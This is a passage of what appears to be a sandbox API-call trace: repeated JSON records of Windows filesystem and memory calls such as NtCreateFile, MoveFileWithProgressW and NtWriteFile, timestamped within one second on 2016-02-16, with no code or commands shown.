{"category": "filesystem", "timestamp": "2016-02-16 17:42:03,253", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,253", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,253", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,253", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,263", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,273", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,283", "api": "NtFreeVirtualMemory"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:03,283", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,283", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,283", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,283", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,293", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,293", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,293", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,293", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,293", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,293", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,303", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,313", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,323", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,323", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,323", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,323", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,323", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,323", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,333", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,333", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,333", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:03,343", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,343", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,353", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,363", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,363", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,363", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:03,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,363", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,363", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,373", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,383", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,383", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,383", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,383", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,383", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,403", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,403", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,403", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,403", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,403", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,403", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,413", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,413", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,413", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,413", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,413", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,423", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,423", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:03,423", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,423", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,423", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,423", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,433", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,443", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,453", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,493", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,503", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,503", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,503", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,503", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,503", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:03,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,513", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,523", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,534", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:03,534", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,544", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,554", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,564", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,574", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,584", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "FindFirstFileExW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,604", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,604", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,604", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,604", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,604", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,604", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,614", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:03,614", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,624", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,634", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,634", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,634", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,634", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,644", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:03,644", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,654", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,654", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,654", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,664", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,674", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,674", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,674", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,674", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,674", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,684", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,694", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,704", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": 